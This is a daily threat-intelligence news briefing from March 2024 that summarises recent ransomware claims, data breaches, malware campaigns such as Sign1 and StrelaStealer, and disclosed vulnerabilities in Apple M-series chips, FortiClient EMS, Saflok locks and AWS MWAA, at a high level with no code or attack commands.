Cyware Daily Threat Intelligence

Daily Threat Briefing • Mar 22, 2024
This website uses cookies and similar technologies to provide essential functionality and improve your experience. Some features, such as demo scheduling and chat support, require marketing cookies to function. By clicking "Accept All", you consent to all cookies. Alternatively, you can customize your preferences, but note that declining marketing cookies will limit certain website features.
Daily Threat Briefing • Mar 22, 2024
A formidable challenge hovers over Apple due to an unpatchable vulnerability found in its M-series chips, which threatens to expose secret encryption keys. On the malware front, a new malware campaign dubbed Sign1 infected 39,000 websites in six months, causing unwanted redirects and popup ads. The incident garnered attention from security experts right after an infected site showed undesirable popup ads. A new phishing wave has also surfaced spreading the ever-evolving StrelaStealer malware across over 100 EU and U.S. organizations, found Palo Alto’s Unit 42.
New research laid bare over 800 suspicious npm packages, allowing stealthy installation of malicious dependencies. Vigilance and package analysis are a must to protect developers from running harmful code. Additionally, a one-click vulnerability dubbed FlowFixation was discovered impacting AWS's Managed Workflows Apache Airflow service.
Rhysida group claims attack on MarineMax
Rhysida ransomware group claimed responsibility for the recent cyberattack on the U.S. luxury yacht dealer MarineMax. Although MarineMax initially disclosed the incident without mentioning ransomware, Rhysida has now posted snippets of stolen data on its website. The majority of leaked documents seem related to accounts and finances. Rhysida is reportedly conducting a seven-day auction for the data.
SCAA targeted in a cyberattack
The South China Athletic Association (SCAA) faced a cyberattack on March 17, which prompted the organization to shut down affected servers. An investigation estimated 70,000 affected individuals. Authorities recommended victims stay vigilant, change passwords, and handle personal data carefully.
Air Europa leaks customer data
Spanish airline Air Europa disclosed a data breach compromising customer data, including names, birthdays, nationalities, ID cards, passport details, and phone numbers. Despite no evidence of fraudulent use of the data leaked, the breach raised concerns among individuals.
Malware campaign infects 39,000 websites
A newly discovered malware campaign, dubbed Sign1, infected over 39,000 websites in the past six months, primarily targeting WordPress sites. The threat actors inject malicious scripts into custom HTML widgets and legitimate plugins like Simple Custom CSS and JS, utilizing time-based randomization to evade detection. The malware redirects visitors to scam sites, exploiting major platform referrals while remaining dormant in other cases.
npm registry bug exposes developers to threats
JFrog's research uncovered over 800 npm packages with discrepancies between registry entries and package contents, including 18 exploitable to manifest confusion. This vulnerability, first documented in 2023, allowed threat actors to sneak malicious dependencies into developers' systems. While there’s no sign of any exploitation so far, developers were urged to verify package safety, as relying solely on npm's appearance can be risky.
StrelaStealer infects hundreds of organizations
StrelaStealer, a notorious email credential-stealing malware, launched large-scale campaigns that have already impacted over 100 organizations in the EU and the U.S. These campaigns employ spam emails with varying attachment formats to deliver the StrelaStealer's DLL payload, with attackers constantly changing tactics to evade detection. The malware, capable of stealing email login data, has been involved in large-scale campaigns since its disclosure in November 2022.
Apple M-Series chips exposed to key leakage threat
Academic researchers unveiled an unpatchable flaw in Apple's M-series chips, posing a grave threat to secret encryption key leakage. The flaw, inherent in the chip architecture, jeopardizes security without feasible performance-preserving fixes. Foresight News highlights risks to wallet keys, with no direct remedies available. Exploiting a side channel, attackers can intercept end-to-end encryption keys during cryptographic operations.
FortiClient EMS bug comes under attack
Horizon3 disclosed a PoC exploit for a critical SQL injection vulnerability in Fortinet's FortiClient Enterprise Management Server. This flaw, CVE-2023-48788, allows unauthenticated attackers to execute unauthorized commands. Active exploitation in the wild prompts urgent upgrades: FortiClientEMS 7.2.0 through 7.2.2 should be upgraded to 7.2.3 or higher, while versions 7.0.1 through 7.0.10 should be upgraded to 7.0.11 or above.
Flaws in Saflok locks put millions of doors at risk
Security researchers reported multiple vulnerabilities in three million Saflok electronic RFID locks deployed in 13,000 hotel properties globally. Despite disclosure to the manufacturer in November 2022, active exploitation concerns arise due to the vulnerabilities' longstanding existence. The attack involves spoofing master keys and crafting forged keycards, demonstrating the critical impact on hotel security.
ATO possible through AWS service bug
Tenable disclosed the FlowFixation vulnerability in AWS's Managed Workflows Apache Airflow (MWAA) service, which could have allowed attackers to take over user accounts. Exploiting a session fixation flaw and AWS domain misconfiguration, attackers could perform remote code execution or lateral movement. The flaw highlighted a broader issue with shared-parent domains across cloud services, leading to risks such as cookie tossing and CSRF protection bypass.